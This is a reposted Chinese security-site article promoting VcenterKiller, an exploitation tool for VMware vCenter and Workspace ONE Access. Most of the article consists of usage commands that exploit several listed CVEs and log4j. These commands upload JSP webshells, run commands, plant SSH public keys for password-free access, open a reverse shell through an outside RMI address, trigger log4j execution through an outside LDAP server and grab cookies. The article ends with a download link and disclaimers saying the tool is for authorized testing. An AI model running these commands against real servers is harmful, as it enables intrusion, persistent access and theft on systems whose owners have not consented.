【神兵利器】Vcenter综合利用工具

admin
admin
admin
139598
文章
114
评论
2024年12月15日23:28:42评论27 views字数 1045阅读3分29秒阅读模式
项目介绍
VcenterKiller是一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接
使用方法

go build -o main.exe

./main.exe -u https://192.168.1.1 -m 21985 -c whoami

./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp

./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp

./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥

./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx

./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j

./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务

./main.exe -u https://xx.xx.com -m 22954 whoami

./main.exe -u https://xx.xx.com -m 22972 //get cookie

./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656

免责声明

本工具仅面向合法授权的企业安全建设行为,例如企业内部攻防演练、漏洞验证和复测,如您需要测试本工具的可用性,请自行搭建靶机环境。

在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标使用。

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任

下载地址

https://github.com/Schira4396/VcenterKiller

原文始发于微信公众号(七芒星实验室):【神兵利器】Vcenter综合利用工具

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月15日23:28:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【神兵利器】Vcenter综合利用工具https://cn-sec.com/archives/3510102.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息